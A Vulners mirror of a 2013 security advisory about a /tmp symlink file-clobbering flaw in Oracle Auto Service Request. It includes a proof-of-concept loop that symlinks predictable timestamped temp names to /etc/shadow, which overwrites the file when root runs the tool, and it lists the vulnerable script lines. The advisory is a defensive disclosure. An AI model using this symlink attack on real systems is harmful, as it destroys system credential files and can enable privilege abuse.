Vulners
Lucene search
Oracle Auto Service Request File Clobber
🗓️ 01 Mar 2013 00:00:00Reported by Larry W. CashdollarType 
packetstorm🔗 packetstormsecurity.com👁 24 Views
`Oracle Auto Service Request /tmp file clobbering vulnerability
http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm
I noticed it creates files insecurely in /tmp using time stamps instead of mkstemp(). You can clobber root owned files if you know when around the time the root administrator will be using this utility.
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@oracle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
Problem code:
The asr binary is a wrapper for a java class, the following snippet of code is where the error lies:
/sbin/sh:root@unix-solaris# grep -n tmp asr
409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'`
1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
This affects the software package on both Solaris and Linux.
Vendor notified about a month ago.
@_larry0
Larry W. Cashdollar
http://otiose.dhs.org/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Mar 2013 00:00Current
0.5Low risk
Vulners AI Score0.5